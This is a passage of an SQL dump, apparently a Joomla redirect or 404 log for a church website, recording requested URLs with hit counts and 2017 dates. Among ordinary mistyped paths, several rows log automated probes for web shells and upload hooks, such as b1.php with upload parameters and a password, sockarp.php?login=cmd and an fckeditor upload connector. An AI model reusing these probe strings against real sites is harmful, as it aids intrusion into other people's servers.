(5557, 'http://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/tiddlywiki/config.php', NULL, 'http://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/tiddlywiki/config.php', '', 1, 0, '2017-06-15 14:37:55', '0000-00-00 00:00:00', 301),
(5558, 'http://lifeoasisinternationalchurch.org/language/en-gb/advanced_settings.php', NULL, 'http://lifeoasisinternationalchurch.org/language/en-gb/advanced_settings.php', '', 1, 0, '2017-06-15 16:50:16', '0000-00-00 00:00:00', 301),
(5559, 'http://www.lifeoasisinternationalchurch.org/info', NULL, '', '', 1, 0, '2017-06-15 17:09:39', '0000-00-00 00:00:00', 301),
(5560, 'http://lifeoasisinternationalchurch.org/footer.php', NULL, 'http://lifeoasisinternationalchurch.org/footer.php', '', 1, 0, '2017-06-15 20:21:07', '0000-00-00 00:00:00', 301),
(5561, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/', NULL, '', '', 1, 0, '2017-06-16 04:54:59', '0000-00-00 00:00:00', 301),
(5562, 'http://lifeoasisinternationalchurch.org/gobc2017the', NULL, '', '', 2, 0, '2017-06-16 07:31:07', '0000-00-00 00:00:00', 301),
(5563, 'https://lifeoasisinternationalchurch.org/?view=reset&itemid=101/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-06-16 10:04:10', '0000-00-00 00:00:00', 301),
(5564, 'https://lifeoasisinternationalchurch.org/?view=reset&itemid=101/index.php?option=com_users&view=registration', NULL, '', '', 1, 0, '2017-06-16 10:04:13', '0000-00-00 00:00:00', 301),
(5565, 'http://www.lifeoasisinternationalchurch.org/component/users/index.php?option=com_user&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 1, 0, '2017-06-16 10:44:47', '0000-00-00 00:00:00', 301),
(5566, 'http://www.lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', '', 1, 0, '2017-06-16 10:44:48', '0000-00-00 00:00:00', 301),
(5567, 'https://142.4.21.132/cherryweb', NULL, '', '', 1, 0, '2017-06-16 19:08:37', '0000-00-00 00:00:00', 301),
(5568, 'http://www.lifeoasisinternationalchurch.org/gobc20', NULL, '', '', 1, 0, '2017-06-16 19:44:16', '0000-00-00 00:00:00', 301),
(5569, 'http://www.lifeoasisinternationalchurch.org/periscope/private', NULL, '', '', 1, 0, '2017-06-16 19:58:23', '0000-00-00 00:00:00', 301),
(5570, 'http://www.lifeoasisinternationalchurch.org/strmin', NULL, '', '', 1, 0, '2017-06-16 21:49:39', '0000-00-00 00:00:00', 301),
(5571, 'http://lifeoasisinternationalchurch.org/backups.php?mode=config&key=c6y1f2ea7217pbtl1flch98sopfo/r1z76/okfae', NULL, '', '', 2, 0, '2017-06-17 00:30:42', '0000-00-00 00:00:00', 301),
(5572, 'https://lifeoasisinternationalchurch.org/template-info-2/the-church-2', NULL, '', '', 79, 0, '2017-06-17 02:59:27', '0000-00-00 00:00:00', 301),
(5573, 'http://lifeoasisinternationalchurch.org/user/', NULL, '', '', 4, 0, '2017-06-17 06:11:32', '0000-00-00 00:00:00', 301),
(5574, 'http://lifeoasisinternationalchurch.org/privatte streaming', NULL, '', '', 1, 0, '2017-06-17 09:07:31', '0000-00-00 00:00:00', 301),
(5575, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/41-branches', NULL, '', '', 13, 0, '2017-06-17 11:51:26', '0000-00-00 00:00:00', 301),
(5576, 'https://www.lifeoasisinternationalchurch.org/t', NULL, '', '', 175, 0, '2017-06-17 13:35:01', '0000-00-00 00:00:00', 301),
(5577, 'http://lifeoasisinternationalchurch.org/components/com_foxcontact/', NULL, '', '', 4, 0, '2017-06-17 14:35:33', '0000-00-00 00:00:00', 301),
(5578, 'http://lifeoasisinternationalchurch.org/c0nfig.php', NULL, 'http://lifeoasisinternationalchurch.org/c0nfig.php', '', 1, 0, '2017-06-17 16:30:43', '0000-00-00 00:00:00', 301),
(5579, 'http://www.lifeoasisinternationalchurch.org/streaming)', NULL, '', '', 1, 0, '2017-06-17 17:40:24', '0000-00-00 00:00:00', 301),
(5580, 'http://lifeoasisinternationalchurch.org/cron.php', NULL, 'http://lifeoasisinternationalchurch.org/cron.php', '', 1, 0, '2017-06-17 19:31:57', '0000-00-00 00:00:00', 301),
(5581, 'http://lifeoasisinternationalchurch.org/content-wrapper.php', NULL, 'http://lifeoasisinternationalchurch.org/content-wrapper.php', '', 1, 0, '2017-06-18 01:23:07', '0000-00-00 00:00:00', 301),
(5582, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/5', NULL, '', '', 8, 0, '2017-06-18 07:05:51', '0000-00-00 00:00:00', 301),
(5583, 'http://lifeoasisinternationalchurch.org/streamining', NULL, '', '', 1, 0, '2017-06-18 07:18:28', '0000-00-00 00:00:00', 301),
(5584, 'http://lifeoasisinternationalchurch.org/temp1-1.php', NULL, 'http://lifeoasisinternationalchurch.org/temp1-1.php', '', 1, 0, '2017-06-18 07:56:05', '0000-00-00 00:00:00', 301),
(5585, 'http://www.lifeoasisinternationalchurch.org/resourcess/streaming', NULL, '', '', 1, 0, '2017-06-18 10:07:52', '0000-00-00 00:00:00', 301),
(5586, 'http://www.lifeoasisinternationalchurch.org/resourcess/live-streaming', NULL, '', '', 1, 0, '2017-06-18 10:08:00', '0000-00-00 00:00:00', 301),
(5587, 'http://www.lifeoasisinternationalchurch.org/streamu', NULL, '', '', 1, 0, '2017-06-19 18:48:06', '0000-00-00 00:00:00', 301),
(5588, 'https://lifeoasisinternationalchurch.org/index.php/tutorials/rev-olusola-ayodele-areogun', NULL, '', '', 18, 0, '2017-06-20 00:28:08', '0000-00-00 00:00:00', 301),
(5589, 'http://lifeoasisinternationalchurch.org/11-demo-articles/5-menu-options', NULL, '', '', 1, 0, '2017-06-21 02:52:45', '0000-00-00 00:00:00', 301),
(5590, 'http://www.lifeoasisinternationalchurch.org/license.php', NULL, '', '', 2, 0, '2017-06-21 08:36:08', '0000-00-00 00:00:00', 301),
(5591, 'http://lifeoasisinternationalchurch.org/11.php', NULL, '', '', 1, 0, '2017-06-21 11:57:04', '0000-00-00 00:00:00', 301),
(5592, 'http://lifeoasisinternationalchurch.org/wp-cods.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-06-21 14:31:30', '0000-00-00 00:00:00', 301),
(5593, 'http://lifeoasisinternationalchurch.org/wp-inde.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-06-21 14:48:53', '0000-00-00 00:00:00', 301),
(5594, 'http://www.lifeoasisinternationalchurch.org/prayer/57-prophetic-words-for-day-5', NULL, '', '', 1, 0, '2017-06-22 05:34:53', '0000-00-00 00:00:00', 301),
(5595, 'http://lifeoasisinternationalchurch.org//license.php', NULL, '', '', 2, 0, '2017-06-22 09:37:46', '0000-00-00 00:00:00', 301),
(5596, 'http://lifeoasisinternationalchurch.org/forum.php', NULL, '', '', 2, 0, '2017-06-22 11:26:09', '0000-00-00 00:00:00', 301),
(5597, 'http://lifeoasisinternationalchurch.org/post.php', NULL, '', '', 1, 0, '2017-06-22 14:27:16', '0000-00-00 00:00:00', 301),
(5598, 'https://www.spiritmeat.net/accordion-a/level-2', NULL, '', '', 1, 0, '2017-06-22 18:29:12', '0000-00-00 00:00:00', 301),
(5599, 'https://www.spiritmeat.net/accordion-a/level-21', NULL, '', '', 1, 0, '2017-06-22 18:29:15', '0000-00-00 00:00:00', 301),
(5600, 'https://www.spiritmeat.net/accordion-a/level-22', NULL, '', '', 1, 0, '2017-06-22 18:29:16', '0000-00-00 00:00:00', 301),
(5601, 'https://www.spiritmeat.net/accordion-b/level-2', NULL, '', '', 1, 0, '2017-06-22 18:29:21', '0000-00-00 00:00:00', 301),
(5602, 'https://www.spiritmeat.net/accordion-b/level-21', NULL, '', '', 1, 0, '2017-06-22 18:29:23', '0000-00-00 00:00:00', 301),
(5603, 'https://www.spiritmeat.net/sample-levels/level-21', NULL, '', '', 1, 0, '2017-06-22 18:31:38', '0000-00-00 00:00:00', 301),
(5604, 'https://www.spiritmeat.net/sample-levels/level-22', NULL, '', '', 1, 0, '2017-06-22 18:31:42', '0000-00-00 00:00:00', 301),
(5605, 'http://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/z80/config.php', NULL, 'http://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/z80/config.php', '', 2, 0, '2017-06-22 19:39:08', '0000-00-00 00:00:00', 301),
(5606, 'http://lifeoasisinternationalchurch.org/themes/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/themes/popup-pomo.php', '', 2, 0, '2017-06-22 20:29:10', '0000-00-00 00:00:00', 301),
(5607, 'http://lifeoasisinternationalchurch.org/changelog.php', NULL, 'http://lifeoasisinternationalchurch.org/changelog.php', '', 2, 0, '2017-06-22 20:32:20', '0000-00-00 00:00:00', 301),
(5608, 'http://lifeoasisinternationalchurch.org/maint/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/maint/popup-pomo.php', '', 2, 0, '2017-06-23 01:15:16', '0000-00-00 00:00:00', 301),
(5609, 'http://lifeoasisinternationalchurch.org/phpmail/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/phpmail/popup-pomo.php', '', 2, 0, '2017-06-23 02:09:50', '0000-00-00 00:00:00', 301),
(5610, 'http://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/pascal/config.php', NULL, 'http://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/pascal/config.php', '', 1, 0, '2017-06-23 02:57:31', '0000-00-00 00:00:00', 301),
(5611, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/5-menu-options', NULL, '', '', 1, 0, '2017-06-23 12:23:52', '0000-00-00 00:00:00', 301),
(5612, 'http://lifeoasisinternationalchurch.org/streaming private', NULL, '', '', 1, 0, '2017-06-23 19:29:36', '0000-00-00 00:00:00', 301),
(5613, 'http://lifeoasisinternationalchurch.org/streaming-private', NULL, '', '', 6, 0, '2017-06-23 20:24:39', '0000-00-00 00:00:00', 301),
(5614, 'http://www.lifeoasisinternationalchurch.org/privatestream', NULL, '', '', 1, 0, '2017-06-23 21:05:36', '0000-00-00 00:00:00', 301),
(5615, 'http://www.lifeoasisinternationalchurch.org/private/stream', NULL, '', '', 1, 0, '2017-06-23 21:05:42', '0000-00-00 00:00:00', 301),
(5616, 'http://lifeoasisinternationalchurch.org/logs/thumbsj3tmp/img.resize.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-06-23 22:36:21', '0000-00-00 00:00:00', 301),
(5617, 'http://lifeoasisinternationalchurch.org/language/thumbsj3tmp/img.resize.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-06-23 22:39:54', '0000-00-00 00:00:00', 301),
(5618, 'http://www.lifeoasisinternationalchurch.org/resources/live-streaming/privte', NULL, '', '', 1, 0, '2017-06-23 23:12:50', '0000-00-00 00:00:00', 301),
(5619, 'http://lifeoasisinternationalchurch.org/media/thumbsj3tmp/img.resize.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-06-23 23:27:33', '0000-00-00 00:00:00', 301),
(5620, 'http://lifeoasisinternationalchurch.org/wp-cokd.php', NULL, '', '', 1, 0, '2017-06-24 06:09:13', '0000-00-00 00:00:00', 301),
(5621, 'http://www.lifeoasisinternationalchurch.org/index.php/web-of-wisdom-registration', NULL, '', '', 1, 0, '2017-06-24 06:23:26', '0000-00-00 00:00:00', 301),
(5622, 'http://lifeoasisinternationalchurch.org/infos.php', NULL, '', '', 1, 0, '2017-06-24 13:48:06', '0000-00-00 00:00:00', 301),
(5623, 'http://www.lifeoasisinternationalchurch.org/styles', NULL, '', '', 1, 0, '2017-06-24 15:05:07', '0000-00-00 00:00:00', 301),
(5624, 'http://www.lifeoasisinternationalchurch.org/magazine/', NULL, '', '', 1, 0, '2017-06-24 22:02:29', '0000-00-00 00:00:00', 301),
(5625, 'http://www.lifeoasisinternationalchurch.org/prayer/147-day222014-2', NULL, '', '', 1, 0, '2017-06-24 22:38:01', '0000-00-00 00:00:00', 301),
(5626, 'https://lifeoasisinternationalchurch.org/405.html', NULL, '', '', 1, 0, '2017-06-25 03:33:32', '0000-00-00 00:00:00', 301),
(5627, 'http://www.lifeoasisinternationalchurch.org/gobc 2017', NULL, '', '', 1, 0, '2017-06-25 06:31:13', '0000-00-00 00:00:00', 301),
(5628, 'https://lifeoasisinternationalchurch.org/resources/salvation', NULL, '', '', 59, 0, '2017-06-25 08:13:10', '0000-00-00 00:00:00', 301),
(5629, 'http://lifeoasisinternationalchurch.org/index.php/live-services', NULL, '', '', 1, 0, '2017-06-25 09:02:11', '0000-00-00 00:00:00', 301),
(5630, 'http://www.lifeoasisinternationalchurch.org/b1.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-25 17:48:12', '0000-00-00 00:00:00', 301),
(5631, 'http://www.lifeoasisinternationalchurch.org/mide.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-25 17:48:13', '0000-00-00 00:00:00', 301),
(5632, 'http://www.lifeoasisinternationalchurch.org/default_component.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-25 17:48:16', '0000-00-00 00:00:00', 301),
(5633, 'http://www.lifeoasisinternationalchurch.org/tutorials/logo-editing', NULL, '', '', 1, 0, '2017-06-25 21:19:17', '0000-00-00 00:00:00', 301),
(5634, 'http://www.lifeoasisinternationalchurch.org/tutorials', NULL, '', '', 1, 0, '2017-06-25 22:44:39', '0000-00-00 00:00:00', 301),
(5635, 'http://lifeoasisinternationalchurch.org/message.php', NULL, '', '', 1, 0, '2017-06-26 12:13:46', '0000-00-00 00:00:00', 301),
(5636, 'http://lifeoasisinternationalchurch.org/pgtzcitt.htm', NULL, '', '', 1, 0, '2017-06-26 20:49:23', '0000-00-00 00:00:00', 301),
(5637, 'https://lifeoasisinternationalchurch.org/nwfhpmmy.htm', NULL, '', '', 1, 0, '2017-06-26 20:49:26', '0000-00-00 00:00:00', 301),
(5638, 'http://www.lifeoasisinternationalchurch.org/ukrdbvhi.htm', NULL, '', '', 1, 0, '2017-06-26 20:49:29', '0000-00-00 00:00:00', 301),
(5639, 'https://www.lifeoasisinternationalchurch.org/cowtznvn.htm', NULL, '', '', 1, 0, '2017-06-26 20:49:32', '0000-00-00 00:00:00', 301),
(5640, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct%20christian', NULL, 'http://google.com', '', 9, 0, '2017-06-26 21:18:41', '0000-00-00 00:00:00', 301),
(5641, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy%20spirit', NULL, 'http://google.com', '', 9, 0, '2017-06-26 21:18:42', '0000-00-00 00:00:00', 301),
(5642, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last%20days', NULL, 'http://google.com', '', 9, 0, '2017-06-26 21:18:43', '0000-00-00 00:00:00', 301),
(5643, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/pregnant%20women', NULL, 'http://google.com', '', 9, 0, '2017-06-26 21:18:45', '0000-00-00 00:00:00', 301),
(5644, 'http://lifeoasisinternationalchurch.org/rnnvhs.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-06-26 23:02:01', '0000-00-00 00:00:00', 301),
(5645, 'http://lifeoasisinternationalchurch.org/sample.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-06-26 23:09:49', '0000-00-00 00:00:00', 301),
(5646, 'http://www.lifeoasisinternationalchurch.org/trainng', NULL, '', '', 1, 0, '2017-06-27 21:58:47', '0000-00-00 00:00:00', 301),
(5647, 'https://www.lifeoasisinternationalchurch.org/component/jlexblock/', NULL, 'http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1466.k_ZIoQTBDrF1SXrA9VevzRWC5LCglLOhSaDEqp-rxy8lMTGL5RQoLQWlaUmDH92Sbn6TtHXy38xlFqXFeFLeSA.5a1e055dd2ebbee7d9bf1a2c49dd35b4b2587483&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejY4cHFySjRXSWhXUEF6N2MwT1VrMXlWaE4xTGNfZE1NOGpid0YtU1U1cExleVREMUp1YmFOcmtoSmZFcGtzaDgtbjdSYWhiYkMySS1rMkh6Vkh3SFZWVThkcGx5LWtZYVBJOXZtQnZIeHlQdVZPYXpQVEFlZWx6M3AwYS0tMmpKamJyNUVvQVhMVTY0MUhvdm1YbHp2SGU3YWwyU19GR1k0azhPcDVXU1JTRkE&b64e=2&sign=03f8c9af63d8a86c5dde3d0fbc984adf&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlpL6THwGpJIsK6Bkc3Tvhss-TtkOlVfF1dSHQ0OBh6Ko5Y-vpND0yaJqhUiAm2Noa0ZZYq-P6SBgvE6_HR1nB17_KfR6CJMR5lW47r-9Ra9MewG6yVNfbdg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXma_RTIh0ntCK6oodx8WLeaB0cJQjwBMmaYsiakB_MQOWw_6MSAUjR8qxWLw4nn00tZDX3Gd2KrirSclIm9jNeZllH_QH8WtISr3NMIv-jUA&l10n=ru&cts=1498655355380&mc=3.39742320619', '', 83, 0, '2017-06-28 13:18:18', '0000-00-00 00:00:00', 301),
(5648, 'http://www.lifeoasisinternationalchurch.org/private-training', NULL, '', '', 1, 0, '2017-06-28 21:12:09', '0000-00-00 00:00:00', 301),
(5649, 'http://www.lifeoasisinternationalchurch.org/trainiing', NULL, '', '', 1, 0, '2017-06-28 22:03:29', '0000-00-00 00:00:00', 301),
(5650, 'http://lifeoasisinternationalchurch.org/xygehmln', NULL, '', '', 1, 0, '2017-06-29 08:53:07', '0000-00-00 00:00:00', 301),
(5651, 'http://lifeoasisinternationalchurch.org/xaa', NULL, '', '', 1, 0, '2017-06-29 08:53:07', '0000-00-00 00:00:00', 301),
(5652, 'https://lifeoasisinternationalchurch.org/goaruiyg', NULL, '', '', 1, 0, '2017-06-29 08:53:08', '0000-00-00 00:00:00', 301),
(5653, 'https://lifeoasisinternationalchurch.org/xaa', NULL, '', '', 1, 0, '2017-06-29 08:53:09', '0000-00-00 00:00:00', 301),
(5654, 'http://www.lifeoasisinternationalchurch.org/rtlnkqpb', NULL, '', '', 1, 0, '2017-06-29 08:53:10', '0000-00-00 00:00:00', 301),
(5655, 'http://www.lifeoasisinternationalchurch.org/xaa', NULL, '', '', 1, 0, '2017-06-29 08:53:11', '0000-00-00 00:00:00', 301),
(5656, 'https://www.lifeoasisinternationalchurch.org/tvchjsoh', NULL, '', '', 1, 0, '2017-06-29 08:53:12', '0000-00-00 00:00:00', 301),
(5657, 'https://www.lifeoasisinternationalchurch.org/xaa', NULL, '', '', 1, 0, '2017-06-29 08:53:13', '0000-00-00 00:00:00', 301),
(5658, 'http://lifeoasisinternationalchurch.org/bran', NULL, '', '', 1, 0, '2017-06-29 17:14:50', '0000-00-00 00:00:00', 301),
(5659, 'http://lifeoasisinternationalchurch.org/branc', NULL, '', '', 1, 0, '2017-06-29 17:14:55', '0000-00-00 00:00:00', 301),
(5660, 'http://lifeoasisinternationalchurch.org/branch', NULL, '', '', 1, 0, '2017-06-29 17:15:00', '0000-00-00 00:00:00', 301),
(5661, 'http://lifeoasisinternationalchurch.org/636343681558476350', NULL, '', '', 1, 0, '2017-06-29 19:22:34', '0000-00-00 00:00:00', 301),
(5662, 'http://lifeoasisinternationalchurch.org/tobey.php', NULL, '', '', 1, 0, '2017-06-30 08:47:33', '0000-00-00 00:00:00', 301),
(5663, 'http://lifeoasisinternationalchurch.org/prayer.html', NULL, '', '', 1, 0, '2017-06-30 11:01:29', '0000-00-00 00:00:00', 301),
(5664, 'http://lifeoasisinternationalchurch.org/qhuivesa.htm', NULL, '', '', 1, 0, '2017-06-30 15:44:37', '0000-00-00 00:00:00', 301),
(5665, 'http://lifeoasisinternationalchurch.org/comments.php', NULL, '', '', 1, 0, '2017-06-30 17:25:20', '0000-00-00 00:00:00', 301),
(5666, 'http://lifeoasisinternationalchurch.org/partnership/form', NULL, '', '', 24, 0, '2017-07-01 04:56:09', '0000-00-00 00:00:00', 301),
(5667, 'http://www.lifeoasisinternationalchurch.org/loic-forum', NULL, '', '', 1, 0, '2017-07-01 11:43:15', '0000-00-00 00:00:00', 301),
(5668, 'http://www.lifeoasisinternationalchurch.org/partnership/form', NULL, 'https://www.google.com/', '', 27, 0, '2017-07-01 14:09:23', '0000-00-00 00:00:00', 301),
(5669, 'https://www.lifeoasisinternationalchurch.org/partnership/form', NULL, '', '', 205, 0, '2017-07-01 15:11:15', '0000-00-00 00:00:00', 301),
(5670, 'http://lifeoasisinternationalchurch.org/options.php', NULL, '', '', 2, 0, '2017-07-02 05:25:05', '0000-00-00 00:00:00', 301),
(5671, 'http://www.lifeoasisinternationalchurch.org/facebooklive', NULL, '', '', 1, 0, '2017-07-02 09:48:01', '0000-00-00 00:00:00', 301),
(5672, 'http://www.lifeoasisinternationalchurch.org/streming', NULL, '', '', 6, 0, '2017-07-02 12:04:00', '0000-00-00 00:00:00', 301),
(5673, 'http://lifeoasisinternationalchurch.org/sockarp.php?login=cmd', NULL, '', '', 1, 0, '2017-07-02 14:03:46', '0000-00-00 00:00:00', 301),
(5674, 'http://www.lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1499017814426', NULL, 'http://www.lifeoasisinternationalchurch.org/facebook', '', 1, 0, '2017-07-02 17:50:16', '0000-00-00 00:00:00', 301),
(5675, 'http://lifeoasisinternationalchurch.org/tmp.php', NULL, '', '', 1, 0, '2017-07-03 00:14:37', '0000-00-00 00:00:00', 301),
(5676, 'https://lifeoasisinternationalchurch.org/partnership/form', NULL, '', '', 74, 0, '2017-07-03 02:55:30', '0000-00-00 00:00:00', 301),
(5677, 'http://www.lifeoasisinternationalchurch.org/youtubehttp://www.lifeoasisinternationalchurch.org/streaming', NULL, '', '', 2, 0, '2017-07-03 05:55:17', '0000-00-00 00:00:00', 301),
(5678, 'http://lifeoasisinternationalchurch.org/configss.php?check=1', NULL, '', '', 1, 0, '2017-07-03 17:37:46', '0000-00-00 00:00:00', 301),
(5679, 'http://lifeoasisinternationalchurch.org/about.php', NULL, '', '', 1, 0, '2017-07-03 23:13:54', '0000-00-00 00:00:00', 301),
(5680, 'http://www.lifeoasisinternationalchurch.org/stteaming', NULL, '', '', 1, 0, '2017-07-04 06:38:25', '0000-00-00 00:00:00', 301),
(5681, 'https://lifeoasisinternationalchurch.org/resources/blog/item/scriptural confession for pregnant women_files/0', NULL, '', '', 2, 0, '2017-07-04 07:07:06', '0000-00-00 00:00:00', 301),
(5682, 'http://lifeoasisinternationalchurch.org/marvin.php', NULL, '', '', 1, 0, '2017-07-04 12:01:01', '0000-00-00 00:00:00', 301),
(5683, 'http://www.lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1499170126994', NULL, 'http://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2017-07-04 12:08:44', '0000-00-00 00:00:00', 301),
(5684, 'http://lifeoasisinternationalchurch.org//fckeditor/editor/filemanager/connectors/php/upload.php?type=media', NULL, '', '', 1, 0, '2017-07-04 12:35:20', '0000-00-00 00:00:00', 301),
(5685, 'http://www.lifeoasisinternationalchurch.org/-resources/-live-streaming', NULL, '', '', 1, 0, '2017-07-04 12:36:23', '0000-00-00 00:00:00', 301),
(5686, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/29989', NULL, '', '', 1, 0, '2017-07-05 01:02:08', '0000-00-00 00:00:00', 301),
(5687, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/89741', NULL, '', '', 1, 0, '2017-07-05 01:02:45', '0000-00-00 00:00:00', 301),
(5688, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/22323', NULL, '', '', 1, 0, '2017-07-05 01:25:07', '0000-00-00 00:00:00', 301),
(5689, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/67007', NULL, '', '', 1, 0, '2017-07-05 01:33:00', '0000-00-00 00:00:00', 301),
(5690, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/34213', NULL, '', '', 1, 0, '2017-07-05 02:11:35', '0000-00-00 00:00:00', 301),
(5691, 'https://www.lifeoasisinternationalchurch.org//s', NULL, '', '', 1, 0, '2017-07-05 05:20:04', '0000-00-00 00:00:00', 301),
(5692, 'http://lifeoasisinternationalchurch.org/courses', NULL, '', '', 1, 0, '2017-07-05 07:03:00', '0000-00-00 00:00:00', 301),
(5693, 'http://lifeoasisinternationalchurch.org/to', NULL, '', '', 1, 0, '2017-07-05 08:37:30', '0000-00-00 00:00:00', 301),
(5694, 'http://lifeoasisinternationalchurch.org/you', NULL, '', '', 1, 0, '2017-07-05 08:37:32', '0000-00-00 00:00:00', 301),
(5695, 'http://lifeoasisinternationalchurch.org/rea', NULL, '', '', 1, 0, '2017-07-05 08:37:54', '0000-00-00 00:00:00', 301),
(5696, 'http://www.lifeoasisinternationalchurch.org/y', NULL, '', '', 3, 0, '2017-07-05 17:22:29', '0000-00-00 00:00:00', 301),
(5697, 'http://www.lifeoasisinternationalchurch.org/yu', NULL, '', '', 1, 0, '2017-07-05 17:22:29', '0000-00-00 00:00:00', 301),
(5698, 'http://www.lifeoasisinternationalchurch.org/yut', NULL, '', '', 1, 0, '2017-07-05 17:22:30', '0000-00-00 00:00:00', 301),
(5699, 'http://www.lifeoasisinternationalchurch.org/yutu', NULL, '', '', 1, 0, '2017-07-05 17:22:34', '0000-00-00 00:00:00', 301),
(5700, 'http://www.lifeoasisinternationalchurch.org/yutub', NULL, '', '', 1, 0, '2017-07-05 17:22:37', '0000-00-00 00:00:00', 301),
(5701, 'http://www.lifeoasisinternationalchurch.org/yutube', NULL, '', '', 1, 0, '2017-07-05 17:22:38', '0000-00-00 00:00:00', 301),
(5702, 'http://www.lifeoasisinternationalchurch.org/treaming', NULL, '', '', 1, 0, '2017-07-05 18:02:15', '0000-00-00 00:00:00', 301),
(5703, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correctchristian', NULL, 'https://www.amazon.com/alexa/smarthome/devices', '', 1, 0, '2017-07-06 05:00:56', '0000-00-00 00:00:00', 301),
(5704, 'http://lifeoasisinternationalchurch.org/youbute', NULL, '', '', 2, 0, '2017-07-06 06:26:13', '0000-00-00 00:00:00', 301),
(5705, 'http://lifeoasisinternationalchurch.org/gobc 2017 online kennyion_html/css', NULL, '', '', 1, 0, '2017-07-06 07:43:13', '0000-00-00 00:00:00', 301),
(5706, 'http://lifeoasisinternationalchurch.org/s treaming', NULL, '', '', 3, 0, '2017-07-06 08:33:22', '0000-00-00 00:00:00', 301),
(5707, 'http://lifeoasisinternationalchurch.org/path4.php?testwrite1=1', NULL, '', '', 1, 0, '2017-07-06 15:16:28', '0000-00-00 00:00:00', 301),
(5708, 'http://www.lifeoasisinternationalchurch.org/about-us/the-church|title=', NULL, '', '', 1, 0, '2017-07-06 16:03:34', '0000-00-00 00:00:00', 301),
(5709, 'https://www.lifeoasisinternationalchurch.org/gobc2017', NULL, '', '', 219, 0, '2017-07-07 00:22:24', '0000-00-00 00:00:00', 301),
(5710, 'https://lifeoasisinternationalchurch.org/gobc2017', NULL, '', '', 252, 0, '2017-07-07 12:10:31', '0000-00-00 00:00:00', 301),
(5711, 'https://www.lifeoasisinternationalchurch.org/live-streaming', NULL, '', '', 62, 0, '2017-07-07 16:01:30', '0000-00-00 00:00:00', 301),
(5712, 'http://www.lifeoasisinternationalchurch.org/resources/livestream', NULL, '', '', 1, 0, '2017-07-07 17:22:12', '0000-00-00 00:00:00', 301),
(5713, 'https://lifeoasisinternationalchurch.org/index.php?option=com_user&view=login', NULL, '', '', 2, 0, '2017-07-07 17:51:25', '0000-00-00 00:00:00', 301),
(5714, 'http://www.lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1499494609851', NULL, 'http://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2017-07-08 06:16:48', '0000-00-00 00:00:00', 301),
(5715, 'http://www.lifeoasisinternationalchurch.org/livestreamining', NULL, '', '', 3, 0, '2017-07-08 11:10:55', '0000-00-00 00:00:00', 301),
(5716, 'http://lifeoasisinternationalchurch.org/tmpe.php', NULL, '', '', 1, 0, '2017-07-08 14:58:13', '0000-00-00 00:00:00', 301),
(5717, 'https://lifeoasisinternationalchurch.org/accomodation.pdf', NULL, '', '', 125, 0, '2017-07-08 17:49:05', '0000-00-00 00:00:00', 301),
(5718, 'http://lifeoasisinternationalchurch.org/includes.php', NULL, '', '', 1, 0, '2017-07-09 07:21:48', '0000-00-00 00:00:00', 301),
(5719, 'http://www.lifeoasisinternationalchurch.org/you', NULL, '', '', 2, 0, '2017-07-09 08:54:49', '0000-00-00 00:00:00', 301),
(5720, 'http://www.lifeoasisinternationalchurch.org/youtub', NULL, '', '', 3, 0, '2017-07-09 08:54:40', '0000-00-00 00:00:00', 301),
